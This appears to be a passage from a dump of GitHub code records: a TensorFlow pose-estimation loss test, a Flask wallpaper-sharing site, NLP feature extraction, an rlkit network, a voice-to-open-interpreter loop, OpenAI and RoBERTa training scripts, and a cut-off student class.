min_loc_xyz=tf.constant([0,0,50],dtype=tf.float32)\n    loc_delta_xyz=tf.constant([150,150,150],dtype=tf.float32)\n    batches = 4\n    feature = np.zeros([batches,10,10,10],dtype=np.float32)\n    \n    pos_01=tf.constant([5,5,5],dtype=tf.float32)\n    pos_02=tf.constant([2,2,8],dtype=tf.float32)\n    pos_11=tf.constant([8,1,0],dtype=tf.float32)\n    pos_12=tf.constant([3,7,1],dtype=tf.float32)\n    pos_21=tf.constant([5,5,0],dtype=tf.float32)\n    pos_31=tf.constant([5,5,0],dtype=tf.float32)\n    pos_32=tf.constant([7,7,0],dtype=tf.float32)\n    \n    feature[0,5,5,5]=1\n    feature[0,2,2,8]=1\n    feature[1,8,1,0]=1\n    feature[1,3,7,1]=0.8\n    feature[2,3,3,0]=1\n    
feature[3,5,5,0]=1\n    feature[3,7,7,0]=1\n    \n    feature = tf.cast(feature, dtype=tf.float32)\n    \n    person_poses = [[min_loc_xyz+loc_delta_xyz*pos_01 for _ in range(15)],\n                    [min_loc_xyz+loc_delta_xyz*pos_02 for _ in range(15)],\n                    [min_loc_xyz+loc_delta_xyz*pos_11 for _ in range(15)],\n                    [min_loc_xyz+loc_delta_xyz*pos_12 for _ in range(15)],\n                    [min_loc_xyz+loc_delta_xyz*pos_21 for _ in range(15)],\n                    [min_loc_xyz+loc_delta_xyz*pos_31 for _ in range(15)],\n                    [min_loc_xyz+loc_delta_xyz*pos_32 for _ in range(15)]]\n    \n    person_poses = tf.cast(person_poses, dtype=tf.float32)\n    \n    batch_indexes = tf.cast([0,0,1,1,2,3,3], dtype=tf.float32)\n    \n    person_pos = person_pos_from_pose(person_poses)\n    \n    pos_loss = person_loss([feature,(batch_indexes, person_pos)],min_loc_xyz,loc_delta_xyz)\n    print(pos_loss)\n    \n    feature = tf.Variable(np.ones([batches,10,10,10]), trainable=True, dtype=tf.float32)\n    \n    optimizer = tf.keras.optimizers.Adam(learning_rate=0.1)\n\n    @tf.function\n    def train_loop(epochs):\n        for epoch in tf.range(epochs):\n            with tf.GradientTape() as tape:\n                loss = person_loss([feature,(batch_indexes, person_pos)],min_loc_xyz,loc_delta_xyz)\n            \n            gradients = tape.gradient(loss, feature)\n            [capped_gradients], _ = tf.clip_by_global_norm([gradients], 10.)\n            optimizer.apply_gradients([(capped_gradients,feature)])\n            tf.print(loss)\n        \n    train_loop(500)\n    \n    heat_map = person_pos_to_heat_map((batch_indexes, person_pos), tf.shape(feature),min_loc_xyz, loc_delta_xyz)\n    pos_gt = tf.unstack(heat_map,axis=0)\n    pos_maps = tf.unstack(feature,axis=0)\n    for pos_batch, gt_batch in zip(pos_maps, pos_gt):\n        for pos, gt in zip(pos_batch, gt_batch):\n            plt.imshow(tf.concat([pos, gt],axis=-1))\n            plt.show()\n\n\ndef test_pose_loss():\n    batches = 4\n    keypoints = 15\n    feature = np.zeros([batches,10,10,10+keypoints],dtype=np.float32)\n    #x\n    feature[0,5,5,0]=0.5\n    feature[0,6,6,0]=0.5\n    feature[1,4,4,0]=0.5\n    feature[1,7,7,0]=0.5\n    feature[2,5,5,0]=1\n    feature[3,5,5,0]=1\n    feature[3,6,6,0]=1\n    \n    #z\n    feature[0,6,6,keypoints+5]=0.5\n    feature[0,6,6,keypoints+6]=0.5\n    feature[1,6,6,keypoints+4]=0.5\n    feature[1,6,6,keypoints+7]=0.5\n    feature[2,5,5,keypoints+5]=1\n    feature[3,6,6,keypoints+5]=1\n    feature[3,6,6,keypoints+6]=1\n    \n    x = y = z = 1500 - 1500\n    kp_gt = tf.constant([[ [x,y,z] for kp in range(keypoints)] for b in range(batches)],dtype = tf.float32)\n    \n    tl = PoseLoss()\n    \n    loss = tl([feature,kp_gt])\n    loss = tl([feature,kp_gt])\n    \n    batches = 2\n    x = y = z = 250 - 1500\n    kp_gt = tf.constant([[ [x+545*kp,y+504*kp,z+200*kp] for kp in range(keypoints)] for b in range(batches)],dtype = tf.float32)\n    \n    \n    feature = tf.Variable(np.ones([batches,10,10,10+keypoints]), trainable=True, dtype=tf.float32)\n    \n    optimizer = tf.keras.optimizers.Adam(learning_rate=0.1)\n\n    @tf.function\n    def train_loop(epochs):\n        for epoch in tf.range(epochs):\n            with tf.GradientTape() as tape:\n                loss = tl([feature,kp_gt])\n            \n            gradients = tape.gradient(loss, feature)\n            [capped_gradients], _ = tf.clip_by_global_norm([gradients], 10.)\n            optimizer.apply_gradients([(capped_gradients,feature)])\n            tf.print(loss)\n        \n    train_loop(100)\n    \n    kp_to_gt = KeypointBatchToPoseGT(tl.xy_loc_delta, tl.xy_min_loc, tl.xy_bins, tl.z_loc_delta, tl.z_min_loc, tl.z_bins)\n    gt_xy, gt_loc_z, gt_index_z = kp_to_gt(kp_gt)\n    prob_maps = tf.unstack(feature,axis=-1)\n    kps = tf.unstack(gt_xy,axis=1)\n    for prob_map_batch, kp_batch in zip(prob_maps, kps):\n        prob_map_batch = heatmap_2d.feature_to_location_propability_map(prob_map_batch)\n        loc_map_xy = tl.pose_loss_xy.loc_map_xy([0.,0.])\n        
loc_xy_batch = heatmap_2d.propability_map_to_location(tf.expand_dims(prob_map_batch,axis=-1),loc_map_xy)\n        for prob_map, kp, loc in zip(prob_map_batch,kp_batch,loc_xy_batch):\n            print(kp, loc)\n            plt.imshow(prob_map)\n            plt.show()\n    \n    feature_z = feature[...,keypoints:]\n    prop_map_z = heatmap_1d.feature_to_location_propability_map(feature_z)\n\n    gt_loc_z = heatmap_1d.expand_gt(gt_index_z, gt_loc_z, tf.shape(prop_map_z)[0:3])\n    \n    loc_map_z = tl.pose_loss_z.loc_map_z(0.)\n    loc_z = heatmap_1d.propability_map_to_location(prop_map_z, loc_map_z)\n    for kp, loc in zip(gt_loc_z,loc_z):\n        plt.imshow(tf.concat([kp[...,0],loc[...,0]],axis=1))\n        plt.show()\n    \n\nclass LossTestTrainingsModel(tf.keras.layers.Layer):\n    def __init__(self, keypoints = 15, depth_bins = 10):\n        super().__init__()\n        self.keypoints = tf.cast(keypoints, dtype = tf.int32)\n        self.depth_bins = tf.cast(depth_bins, dtype = tf.int32)\n        \n    def build(self, inputs_shape):\n        feature_shape, gt_shape = inputs_shape\n        self.representation = tf.Variable(tf.ones([1, 10, 10, self.depth_bins+self.keypoints], dtype = tf.float32), trainable=True, dtype = tf.float32)\n        self.loss = PoseLoss(self.keypoints, self.depth_bins)\n        self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=None, dtype=tf.float32), tf.TensorSpec(shape=[None,self.keypoints,3], dtype=tf.float32))])\n        super().build(inputs_shape)\n\n    def call(self, inputs):\n        feature, gt_target = inputs\n        print(\"Tracing with\", feature, gt_target)\n        batched_repr = tf.repeat(self.representation, repeats = tf.shape(feature)[0], axis=0)\n        return self.loss([batched_repr, gt_target])\n    \n\nif __name__ == \"__main__\":\n    main()","repo_name":"bela127/3D_Person_Pose_Estimation_from_2D_Singelview_Image_Data","sub_path":"src/ShAReD_Net/training/loss/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":26253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34075863838","text":"import os\r\nfrom PIL import Image\r\nfrom flask import Flask, render_template, request, abort\r\nfrom werkzeug.utils import redirect, secure_filename\r\nfrom flask_login import LoginManager, current_user, login_required, logout_user\r\n\r\nfrom data import db_session\r\nfrom data.users import User\r\nfrom data.wallpapers import WallPapers\r\nfrom forms.user import RegisterForm\r\nfrom forms.wallpapers import WallPapersForm\r\nfrom data.tags import Tags\r\n\r\nUPLOAD_FOLDER = './static/img'\r\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\n\r\ndef add_user(name, email):\r\n    user = User()\r\n    user.name = name\r\n    user.email = email\r\n    return user\r\n\r\n\r\ndef add_tags(wallpaper):\r\n    tags = []\r\n    for elem in wallpaper.content.lower().replace(',', '').split():\r\n        tag = Tags()\r\n        tag.title = elem\r\n        tag.wallpaper = wallpaper\r\n        tags.append(tag)\r\n    return tags\r\n\r\n\r\n\r\ndef add_wallpaper(title, file_name, content, user):\r\n    wallpaper = WallPapers()\r\n    wallpaper.title = title\r\n    wallpaper.file = file_name\r\n    wallpaper.content = content\r\n    wallpaper.user = user\r\n    return wallpaper\r\n\r\n\r\ndef created(session):\r\n    # Create the admin user\r\n    admin = add_user('Admin', 'er@gmail.com')\r\n    session.add(admin)\r\n    # Create the user user1\r\n    user1 = add_user('user1', 'user1@gamil.com')\r\n    session.add(user1)\r\n    # Create wallpapers for user user1\r\n    user1 = session.query(User).filter(User.id == 2).first()\r\n    wallpaper = add_wallpaper('forest', 'forest_1.png', 'forest, spring', user1)\r\n    session.add(wallpaper)\r\n    user1.wallpapers.append(wallpaper)\r\n    tags = add_tags(wallpaper)\r\n    \r\n    '''for tag in tags:\r\n        session.add(tag)'''\r\n\r\n    for tag in tags:\r\n        user1.tags.append(tag)\r\n    session.commit()\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    db_sess = db_session.create_session()\r\n    # wallpapers = db_sess.query(WallPapers)\r\n    if current_user.is_authenticated:\r\n        wallpapers = db_sess.query(WallPapers).filter(\r\n            (WallPapers.user == current_user) | (WallPapers.is_private != True))\r\n        name = current_user.name\r\n        text = f'Wallpapers of user {name}'\r\n    else:\r\n        wallpapers = db_sess.query(WallPapers)\r\n        text = 'All wallpapers'\r\n        name = ''\r\n    return render_template(\"index.html\", wallpapers=wallpapers, text=text, name=name)\r\n\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef reqister():\r\n    form = RegisterForm()\r\n    if form.validate_on_submit():\r\n        if form.password.data != form.password_again.data:\r\n            return render_template('register.html', title='Registration',\r\n                                   form=form,\r\n                                   message=\"Passwords do not match\")\r\n        db_sess = db_session.create_session()\r\n        if db_sess.query(User).filter(User.email == form.email.data).first():\r\n            return render_template('register.html', title='Registration',\r\n                                   form=form,\r\n                                   message=\"Such a user already exists\")\r\n        user = User(name=form.name.data, email=form.email.data)\r\n        user.set_password(form.password.data)\r\n        db_sess.add(user)\r\n        db_sess.commit()\r\n        return redirect('/login')\r\n    return render_template('register.html', title='Registration', form=form)\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n    db_sess = db_session.create_session()\r\n    return db_sess.query(User).get(user_id)\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n    from forms.loginform import LoginForm\r\n    form = LoginForm()\r\n    if form.validate_on_submit():\r\n        db_sess = db_session.create_session()\r\n        user = db_sess.query(User).filter(User.email == form.email.data).first()\r\n        if user and user.check_password(form.password.data):\r\n            from flask_login import login_user\r\n            login_user(user, remember=form.remember_me.data)\r\n            return redirect(\"/\")\r\n        return render_template('login.html',\r\n                               message=\"Wrong login or password\",\r\n                               form=form)\r\n    return render_template('login.html', title='Authorization', form=form)\r\n\r\n\r\n@app.route('/logout')\r\n@login_required\r\ndef logout():\r\n    logout_user()\r\n    return redirect(\"/\")\r\n\r\n\r\ndef allowed_file(filename):\r\n    return '.' in filename and \\\r\n           filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\r\n\r\n\r\n@app.route('/wallpapers', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_wallpapers():\r\n    form = WallPapersForm()\r\n    if form.validate_on_submit():\r\n        db_sess = db_session.create_session()\r\n        wallpapers = WallPapers()\r\n        wallpapers.title = form.title.data\r\n        file = request.files['file']\r\n        if file and allowed_file(file.filename):\r\n            filename = secure_filename(file.filename)\r\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\r\n            im = Image.open(f'static/img/{filename}')\r\n            im_resize = im.resize((1900, 1200))\r\n            im_resize.save(f'static/img/{filename}')\r\n            wallpapers.file = filename\r\n        wallpapers.content = form.content.data\r\n\r\n        current_user.wallpapers.append(wallpapers)\r\n\r\n        for tag in add_tags(wallpapers):\r\n            current_user.tags.append(tag)\r\n\r\n        db_sess.merge(current_user)\r\n        db_sess.commit()\r\n\r\n        return redirect('/')\r\n    return render_template('wallpapers.html', title='Adding',\r\n                           form=form)\r\n\r\n\r\n@app.route('/wallpapers_delete/<int:id>', methods=['GET', 'POST'])\r\n@login_required\r\ndef wallpapers_delete(id):\r\n    db_sess = db_session.create_session()\r\n    wallpapers = db_sess.query(WallPapers).filter(WallPapers.id == id,\r\n                                                  WallPapers.user == current_user\r\n                                                  ).first()\r\n    if wallpapers:\r\n        tags_delete = db_sess.query(Tags).filter(Tags.wallpaper_id == wallpapers.id)\r\n        for tag in tags_delete:\r\n            db_sess.delete(tag)\r\n        db_sess.delete(wallpapers)\r\n        db_sess.commit()\r\n    else:\r\n        abort(404)\r\n    return redirect('/')\r\n\r\n\r\n@app.route(\"/show_tags/<tagname>\")\r\ndef show_tags(tagname):\r\n    # logout()\r\n    db_sess = db_session.create_session()\r\n    tags = db_sess.query(Tags).filter(Tags.title == tagname)\r\n    wallpapers_id = db_sess.query(Tags.wallpaper_id).filter(Tags.title == tagname).all()\r\n    wallpapers_id = [item[0] for item in wallpapers_id]\r\n    wallpapers = db_sess.query(WallPapers).filter(WallPapers.id.in_(wallpapers_id))\r\n    text = f'Wallpapers with tag {tagname}'\r\n    return render_template(\"index.html\", wallpapers=wallpapers, text=text, name='')\r\n\r\n\r\n@app.route(\"/show_user/<userid>\")\r\ndef show_user(userid):\r\n    # logout()\r\n    db_sess = db_session.create_session()\r\n    wallpapers = db_sess.query(WallPapers).filter(WallPapers.user_id == userid)\r\n    user = db_sess.query(User).filter(User.id == userid).first()\r\n    text = f'Wallpapers of user {user.name}'\r\n    return render_template(\"index.html\", wallpapers=wallpapers, text=text, name='')\r\n\r\n\r\ndef main():\r\n    db_session.global_init(\"db/wallpaper.db\")\r\n    session = db_session.create_session()\r\n    # Test database creation\r\n    # created(session)\r\n    # Database sanity check\r\n    '''for user in session.query(User):\r\n        print(user)\r\n    for elem in session.query(WallPapers):\r\n        print(elem)'''\r\n    app.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"Ilyha-go/Yandeksp","sub_path":"WebProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10130242334","text":"import os\nimport json\n\nfrom .base_features_extractor import BaseFeaturesExtractor\n\n\nclass FeaturesPsyDict(BaseFeaturesExtractor):\n    # load psydicts\n    psydict_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data', 'psydicts.json')\n    with open(psydict_path) as fp:\n        psydicts = json.load(fp)\n\n    def __init__(self, psy_dict_normalization):\n        super().__init__()\n        
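# normalisation mode: 'abs', 'sentences' or 'words' (validated in _get_div below)\n        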
self.psy_dict_normalization = psy_dict_normalization\n\n def __call__(self, lemma_mys, ) -> dict:\n lemma_text, sentence_count, words_count = FeaturesPsyDict.lem_info(lemma_mys)\n div = self._get_div(self.psy_dict_normalization, sentence_count, words_count)\n\n tgw_normalized_occur_count = self.occur_count_with_normalization(self.psydicts['tgw'], lemma_text, div)\n basic_emotions_normalized_occur_count = self.occur_count_with_normalization(\n self.psydicts['basic_emotions'], lemma_text, div)\n emowords = self.emowords(self.psydicts['emowords'], lemma_text, div)\n sentiment = self.sentiment(self.psydicts['linis-crowd'], lemma_text, div)\n\n return {\n **tgw_normalized_occur_count, **basic_emotions_normalized_occur_count,\n **emowords, **sentiment\n }\n\n @staticmethod\n def lem_info(lemma):\n words_count = 0\n lemma_text = ' '\n sentence_count = len(lemma)\n for sentence in lemma:\n for token in sentence:\n if token.isalpha():\n words_count += 1\n lemma_text += token+' '\n return lemma_text, sentence_count, words_count\n\n def occur_count_with_normalization(self, psydict, lemma_text, div):\n res = {}\n for _dict in psydict:\n res[_dict] = 0.0\n for word in psydict[_dict]:\n res[_dict] += lemma_text.count(' '+word+' ')\n self._normalize(res, div)\n return res\n\n def emowords(self, psydict, lemma_text, div):\n res = {}\n for _dict in psydict:\n res[_dict] = 0.0\n for word in psydict[_dict]:\n res[_dict] += lemma_text.count(' '+word+' ')\n\n res['ew_negative'] += res['+-']\n res['ew_negative'] += res['/-']\n res['ew_de_emotives'] += res['?/']\n res['ew_de_emotives'] += res['-/']\n res['ew_positive'] -= res.pop('+-')\n res['ew_ambivalent'] -= res.pop('?/')\n res['ew_negative'] -= res.pop('-/')\n res['ew_de_emotives'] -= res.pop('/-')\n\n self._normalize(res, div)\n\n return res\n\n def sentiment(self, psydict, lemma_text, div):\n res = {'sentiment_rate': 0.0}\n for word in psydict:\n res['sentiment_rate'] += psydict[word] * lemma_text.count(' '+word+' ')\n res['sentiment_rate'] = res['sentiment_rate'] / div\n return res\n\n def _get_div(self, psy_dict_normalization, sentence_count, words_count):\n if psy_dict_normalization == 'abs':\n div = 1\n elif psy_dict_normalization == 'sentences':\n div = sentence_count\n elif psy_dict_normalization == 'words':\n div = words_count\n else:\n raise TypeError(\"psy_dict_normalization arg should be 'abs', 'words' or 'sentences'\")\n return div\n\n def _normalize(self, res, div):\n for _dict in res:\n res[_dict] /= div\n","repo_name":"tchewik/titanis-open","sub_path":"src/titanis/features/features_psy_dict.py","file_name":"features_psy_dict.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"71519119161","text":"import os\nimport sys\nsys.path.extend(\"..\")\nimport script\nimport numpy as np\n\nif __name__ == \"__main__\":\n # Build configuration object\n config = script.ScriptConfig()\n # Dump data from 10.141.209.3, with original format\n if True:\n downloader = script.MongoDumper(config)\n downloader.dump(np.inf, save_to = config.data_path)\n # Tokenize post\n dir = os.path.dirname(config.data_path)\n file_name, _ = os.path.splitext(os.path.basename(config.data_path))\n new_file_path = os.path.join(dir, file_name+\".tok\")\n script.tokenize_text(config,config.data_path, new_file_path)\n # Change to UTH format\n read_from = new_file_path\n save_to = os.path.join(dir, file_name+\".uth\")\n script.format2UTHD(config, read_from = read_from, save_to = 
save_to)\n","repo_name":"v-mipeng/Hashtag","sub_path":"source/script/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71931501881","text":"\"\"\"\nNetwork that forms an encoding based on random projections and their integrals and derivatives.\n\nAuthor: Ian Char\nDate: December 12, 2022\n\"\"\"\nimport torch\n\nfrom rlkit.torch.networks.mlp import Mlp\nfrom rlkit.torch.core import PyTorchModule\n\n\nclass RprojSIDQNet(PyTorchModule):\n    def __init__(\n        self,\n        obs_dim: int,\n        act_dim: int,\n        num_projections: int,\n        lookback_len: int,\n        decoder_width: int,\n        decoder_depth: int,\n        layer_norm: bool = True,\n        sum_over_terms: bool = False,\n        proj_init_w=1.0,\n    ):\n        \"\"\"Constructor.\n\n        Args:\n            obs_dim: Size of the observation dim.\n            act_dim: Size of the action dim.\n            num_projections: Number of fixed random projections of the observation.\n            lookback_len: The lookback to consider for the integral.\n            decoder_width: Width of the hidden units in the decoder.\n            decoder_depth: Number of hidden layers in the decoder.\n            layer_norm: Whether to layer-normalize the stacked statistics.\n            sum_over_terms: Whether to sum (rather than average) over the lookback.\n            proj_init_w: Bound of the uniform initialization of the projection weights.\n        \"\"\"\n        super().__init__()\n        self.lookback_len = lookback_len\n        self.sum_over_terms = sum_over_terms\n        self.projections = torch.nn.Linear(obs_dim, num_projections, bias=False)\n        self.projections.weight.data.uniform_(-proj_init_w, proj_init_w)\n        self.projections.weight.requires_grad = False\n        self.decoder = Mlp(\n            input_size=num_projections * 3 + obs_dim + act_dim,\n            output_size=1,\n            hidden_sizes=[decoder_width for _ in range(decoder_depth)],\n        )\n        if layer_norm:\n            self.layer_norm = torch.nn.LayerNorm(3 * num_projections)\n        else:\n            self.layer_norm = None\n\n    def forward(self, obs_seq, prev_act_seq, act, masks=None, **kwargs):\n        \"\"\"Forward pass.\n\n        Args:\n            obs_seq: Observation sequence (batch_size, L, obs_dim)\n            prev_act_seq: Previous action sequence (batch_size, L, act_dim)\n            act: The current action (batch_size, act_dim)\n\n        Returns: Value for last observation + action (batch_size, 1)\n        \"\"\"\n        stats = self.projections(obs_seq)\n        if masks is not None:\n            stats *= masks\n        if self.sum_over_terms:\n            iterm = torch.sum(stats, dim=1)\n        else:\n            iterm = torch.mean(stats, dim=1)\n        sid_out = torch.cat([\n            stats[:, -1],\n            iterm,\n            stats[:, -1] - stats[:, -2],\n        ], dim=-1)\n        if self.layer_norm is not None:\n            sid_out = self.layer_norm(sid_out)\n        return self.decoder(torch.cat([\n            obs_seq[:, -1],\n            act,\n            sid_out,\n        ], dim=-1))\n","repo_name":"IanChar/rlkit2","sub_path":"rlkit/torch/networks/seq2val/rproj_sid.py","file_name":"rproj_sid.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9191187545","text":"import speech_recognition as sr\nfrom interpreter.interpreter import Interpreter\n\ncontext = []  # conversation history for the interpreter (assumed to start empty)\ninterpreter = Interpreter(auto_run = True, messages = context)\n\ndef listen_microphone():\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"Listening...\")\n        audio = r.listen(source)\n\n    try:\n        print(\"Recognizing...\")\n        # audio.export(\"audio.wav\", format=\"wav\")\n        # result = model.transcribe(\"audio.wav\")\n        # text = str(result[\"text\"])\n        text = r.recognize_google(audio)\n        print(f\"Text: {text}\")\n        resp = interpreter.chat(str(text), return_messages = True)\n        # with open(\"resp.json\", \"w\") as file:\n        #     json.dump(resp, file)\n    except sr.UnknownValueError:\n        print(\"Could not understand audio\")\n    except sr.RequestError as e:\n        print(f\"Error: {e}\")\n\nwhile True:\n    listen_microphone()","repo_name":"CodeGeek04/merged_project","sub_path":"Sources/windows/speech_recog.py","file_name":"speech_recog.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33285985598","text":"import os\nimport json\nimport random\nimport re\nimport tqdm\nimport argparse\nimport openai\nimport time\nfrom typing import Any\nimport logging\nfrom utils import *\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\nrandom.seed(42)\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"--batch_dir\",\n        type=str,\n        default=\"data/text-davinci-003/\",\n        help=\"The directory where the batch is stored.\",\n    )\n    parser.add_argument(\n        \"--input_tasks_path\",\n        type=str,\n        required=False,\n        default=None,\n        help=\"The path to the input task data.\",\n    )\n\n    parser.add_argument(\n        \"--output_tasks_path\",\n        type=str,\n        required=False,\n        default=None,\n        help=\"The path to the output task data.\",\n    )\n    parser.add_argument(\n        \"--engine\",\n        type=str,\n        default=\"davinci\",\n        help=\"The engine to use.\"\n    )\n    parser.add_argument(\n        \"--request_batch_size\",\n        type=int,\n        default=5,\n        help=\"The number of requests to send to GPT3 at a time.\"\n    )\n    parser.add_argument(\n        \"--max_tokens\",\n        type=int,\n        default=600,\n        help=\"Max input tokens.\"\n    )\n    parser.add_argument(\n        \"--max_generation\",\n        type=int,\n        default=-1,\n        help=\"Max input to generate.\"\n    )\n    parser.add_argument(\n        \"--retries\",\n        type=int,\n        default=5,\n        help=\"failed retry times.\"\n    )\n    parser.add_argument(\n        \"--task\",\n        type=str,\n        required=False,\n        default=None,\n        help=\"the task to generate\"\n    )\n\n    return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    \n    input_tasks=load_or_convert_to_dataframe(args.input_tasks_path)\n    if args.max_generation!=-1:\n        input_tasks=input_tasks[:args.max_generation]\n    instruction=\"\"\n    if args.task=='iCliniq':\n        instruction=\"If you are a doctor, please answer the medical questions based on the patient's description.\"\n    input_instructions = [\n        {\n            \"instruction\": t[\"instruction\"] if \"instruction\" in t else instruction,\n            \"input\": t[\"input\"] if \"input\" in t else \"\",\n        } \n        for t in input_tasks\n    ]\n    \n    print(f\"Loaded {len(input_instructions)} seed instructions\")\n\n    \n    os.makedirs(args.batch_dir, exist_ok=True)\n    # load the LM-generated instructions\n    machine_output = []\n    if os.path.exists(os.path.join(args.batch_dir, args.output_tasks_path)):\n        with open(os.path.join(args.batch_dir, args.output_tasks_path), \"r\") as fin:\n            for line in fin:\n                instruction_info = json.loads(line)\n                machine_output.append(instruction_info)\n        print(f\"Loaded {len(machine_output)} machine-generated outputs\")\n\n\n    \n    # now let's generate output!\n    total=len(input_instructions)\n    progress_bar = tqdm.tqdm(total=total)\n\n    progress_bar.update(len(machine_output))\n\n    wait_base = 10\n    retry_cnt = 0\n    batch_size=args.request_batch_size\n    results=[]\n    target_length=args.max_tokens\n    with open(os.path.join(args.batch_dir,args.output_tasks_path), \"a\") as fout:\n        idx=len(machine_output)\n        while len(machine_output) < len(input_instructions):\n            prompts=[]\n            input_list=[]\n            j=0\n            while j < 
min(batch_size,total-idx):\n input_task=input_instructions[idx+j]\n input_list.append(input_task)\n task_prompt = gpt_output_generation_encode_prompt(input_task,args)\n if task_prompt==\"\":\n break\n prompts.append(task_prompt)\n j+=1\n if len(prompts)==0:\n break\n while retry_cnt <= args.retries:\n batch_results=[\"\"] * len(prompts)\n try:\n # batched example, with 10 story completions per request\n batch_predictions = openai.Completion.create(\n model=args.engine,\n prompt=prompts,\n max_tokens=target_length,\n temperature= 0\n )\n for choice in batch_predictions.choices:\n batch_results[choice.index] = choice.text\n\n # predictions += batch_results\n wait_base = 10\n \n retry_cnt=0\n break\n\n except openai.error.OpenAIError as e:\n print(f\"OpenAIError: {e}.\")\n if \"Please reduce the length of the messages or completion\" in str(e):\n target_length = int(target_length * 0.8)\n print(f\"Reducing target length to {target_length}, retrying...\")\n else:\n retry_cnt += 1\n print(\"retry number: \", retry_cnt)\n time.sleep(wait_base)\n wait_base = wait_base*1.5\n\n instructions = []\n for i,result in enumerate(batch_results):\n try:\n input_list[i]['output']=result\n fout.write(json.dumps(input_list[i]) + \"\\n\")\n machine_output.append(input_list[i]['output'])\n idx+=1\n progress_bar.update(1)\n except:\n continue\n\n","repo_name":"XZhang97666/AlpaCare","sub_path":"task_output_generation/output_generation_completion.py","file_name":"output_generation_completion.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"19342811700","text":"import pandas as pd\n\nimport os\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom transformers import (AutoModel,AutoModelForMaskedLM, \n AutoTokenizer, LineByLineTextDataset,\n DataCollatorForLanguageModeling,\n Trainer, TrainingArguments)\n\n\nfrom config.configs import Config as c\nfrom utils import process_text\n\nif __name__ == \"__main__\":\n BASE_DATA_PATH = c.base_data_path\n OUTPUT_PATH = c.output_path + \"/clrp_roberta_base\"\n CHKPT_PATH = c.output_path + '/clrp_roberta_base_chk'\n\n if not os.path.exists(OUTPUT_PATH):\n os.makedirs(OUTPUT_PATH)\n\n if not os.path.exists(CHKPT_PATH):\n os.makedirs(CHKPT_PATH)\n\n train_data = pd.read_csv(os.path.join(BASE_DATA_PATH, 'train.csv'))\n test_data = pd.read_csv(os.path.join(BASE_DATA_PATH, 'test.csv'))\n\n clrp_data = pd.concat([train_data, test_data])\n\n # Prepare data\n text_data = clrp_data[\"excerpt\"].apply(process_text)\n text = '\\n'.join(text_data.tolist())\n # Temporarily output as .txt file\n TEXT_OUTPUT_PATH = os.path.join(c.output_path, 'text.txt')\n with open(TEXT_OUTPUT_PATH, 'w') as f:\n f.write(text)\n\n # Load model and tokenizer\n model_name = 'roberta-base'\n model = AutoModelForMaskedLM.from_pretrained(model_name)\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n tokenizer.save_pretrained(OUTPUT_PATH)\n\n train_dataset = LineByLineTextDataset(\n tokenizer=tokenizer,\n file_path=TEXT_OUTPUT_PATH, #mention train text file here\n block_size=256)\n\n valid_dataset = LineByLineTextDataset(\n tokenizer=tokenizer,\n file_path=TEXT_OUTPUT_PATH, #mention valid text file here\n block_size=256)\n\n data_collator = DataCollatorForLanguageModeling(\n tokenizer=tokenizer, mlm=True, mlm_probability=0.15)\n\n training_args = TrainingArguments(\n output_dir=os.path.join(CHKPT_PATH), #select model path for checkpoint\n overwrite_output_dir=True,\n num_train_epochs=1,\n 
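# batch sizes below are per device; the effective batch scales with the device count\n        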
per_device_train_batch_size=16,\n        per_device_eval_batch_size=16,\n        evaluation_strategy= 'steps',\n        save_total_limit=2,\n        eval_steps=200,\n        metric_for_best_model='eval_loss',\n        greater_is_better=False,\n        load_best_model_at_end =True,\n        prediction_loss_only=True,\n        report_to = \"none\")\n\n    trainer = Trainer(\n        model=model,\n        args=training_args,\n        data_collator=data_collator,\n        train_dataset=train_dataset,\n        eval_dataset=valid_dataset)\n\n    trainer.train()\n    trainer.save_model(OUTPUT_PATH)","repo_name":"ttya16/commonlit_readability","sub_path":"src/pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72891943161","text":"class student:\n    def __init__(self,name,age,branch,rno):\n        self.name=name\n        self.age=age\n        self.branch=branch\n        self.rno=rno\n\n    def studentdata(self):\n        print(\"Student name\",self.name)\n        print(\"student age\",self.age)\n        